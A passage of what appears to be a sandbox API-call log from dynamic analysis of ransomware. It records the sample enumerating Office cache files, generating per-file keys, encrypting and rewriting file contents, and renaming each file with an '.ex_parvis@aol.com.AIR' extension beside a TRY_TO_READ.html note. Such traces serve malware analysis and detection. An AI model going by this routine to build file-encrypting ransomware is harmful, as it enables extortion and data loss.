lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xc72 [0132.475] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0132.475] GetProcessHeap () returned 0x2e0000 [0132.475] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0132.475] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0132.476] WriteFile (in: hFile=0x478, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0132.477] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0132.477] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0132.477] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc72) returned 0x385368 [0132.477] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc72) returned 0x385fe8 [0132.477] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.477] ReadFile (in: hFile=0x478, lpBuffer=0x385368, nNumberOfBytesToRead=0xc72, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385368*, lpNumberOfBytesRead=0x2acf9c8*=0xc72, lpOverlapped=0x0) returned 1 [0132.477] SetFilePointer (in: hFile=0x478, lDistanceToMove=-3186, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.477] WriteFile (in: hFile=0x478, lpBuffer=0x385fe8*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385fe8*, lpNumberOfBytesWritten=0x2acf9c8*=0xc72, lpOverlapped=0x0) returned 1 [0132.477] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0132.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385fe8 | out: hHeap=0x2e0000) returned 1 [0132.478] CloseHandle (hObject=0x478) returned 1 [0132.478] GetProcessHeap () returned 0x2e0000 [0132.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0132.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0132.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0132.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0132.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0132.479] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x319c88 [0132.479] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0132.479] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0132.479] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0132.479] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0132.479] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", dwFileAttributes=0x80) returned 1 [0132.479] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 78 [0132.479] GetProcessHeap () returned 0x2e0000 [0132.479] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x385368 [0132.479] lstrcpyW (in: lpString1=0x385368, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" [0132.479] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0132.479] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0132.482] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0132.482] GetProcessHeap () returned 0x2e0000 [0132.482] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0132.482] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2865664) returned 1 [0132.482] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2bba00 [0132.482] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0132.482] GetProcessHeap () returned 0x2e0000 [0132.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0132.482] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0132.482] WriteFile (in: hFile=0x478, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0132.484] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0132.484] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0132.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2bba00) returned 0x30d0020 [0132.485] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2bba00) returned 0x3390020 [0132.485] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.485] ReadFile (in: hFile=0x478, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x2bba00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x2bba00, lpOverlapped=0x0) returned 1 [0132.633] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0132.633] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0132.633] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", dwFileAttributes=0x80) returned 1 [0132.634] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 75 [0132.634] GetProcessHeap () returned 0x2e0000 [0132.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0132.634] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" [0132.634] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0132.634] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0132.636] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0132.637] GetProcessHeap () returned 0x2e0000 [0132.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0132.637] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=14819276) returned 1 [0132.637] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xe21fcc [0132.637] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0132.637] GetProcessHeap () returned 0x2e0000 [0132.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0132.637] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0132.637] WriteFile (in: hFile=0x478, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0132.640] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0132.640] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0132.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe21fcc) returned 0x30d0020 [0132.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe21fcc) returned 0x3f00020 [0132.641] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.641] ReadFile (in: hFile=0x478, lpBuffer=0x30d0020, nNumberOfBytesToRead=0xe21fcc, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xe21fcc, lpOverlapped=0x0) returned 1 [0133.409] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35df18 [0133.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0133.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0133.410] GetLastError () returned 0x0 [0133.410] FindNextFileW (in: hFindFile=0x35df18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0133.410] GetLastError () returned 0x0 [0133.410] FindNextFileW (in: hFindFile=0x35df18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0133.410] GetLastError () returned 0x0 [0133.410] FindNextFileW (in: hFindFile=0x35df18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971d0bb0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0133.410] GetLastError () returned 0x0 [0133.410] FindNextFileW (in: hFindFile=0x35df18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0133.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0133.410] GetLastError () returned 0x0 [0133.410] FindNextFileW (in: hFindFile=0x35df18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0133.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0133.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0133.411] GetLastError () returned 0x0 [0133.411] FindNextFileW (in: hFindFile=0x35df18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0133.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0133.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0133.411] GetLastError () returned 0x0 [0133.411] FindNextFileW (in: hFindFile=0x35df18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385368 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0133.411] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0133.411] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0133.411] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", dwFileAttributes=0x80) returned 1 [0133.411] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 75 [0133.411] GetProcessHeap () returned 0x2e0000 [0133.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0133.411] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0133.411] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0133.412] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0133.414] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0133.415] GetProcessHeap () returned 0x2e0000 [0133.415] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0133.415] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1800) returned 1 [0133.415] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x708 [0133.415] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0133.415] GetProcessHeap () returned 0x2e0000 [0133.415] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0133.415] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0133.415] WriteFile (in: hFile=0x47c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0133.417] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0133.417] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, 